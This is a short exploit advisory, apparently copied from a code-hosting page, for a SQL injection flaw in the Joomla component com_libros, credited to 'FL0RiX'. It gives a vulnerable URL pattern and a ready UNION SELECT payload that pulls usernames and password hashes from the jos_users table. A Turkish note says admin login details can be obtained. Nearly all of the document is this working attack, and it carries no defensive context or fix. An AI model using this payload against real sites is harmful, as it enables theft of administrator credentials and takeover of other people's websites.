16 lines
No EOL
720 B
Text
16 lines
No EOL
720 B
Text
########################################################################
|
|
# Joomla Component com_libros SQL Injection Vulnerability
|
|
########################################################################
|
|
# Author :FL0RiX
|
|
#
|
|
# Name : com_libros
|
|
#
|
|
# Bug Type : SQL Injection
|
|
#
|
|
# Infection : Admin login bilgileri alinabilir.
|
|
#
|
|
# Demo Vuln :
|
|
#
|
|
# http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT]
|
|
#Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
|
|
######################################################################## |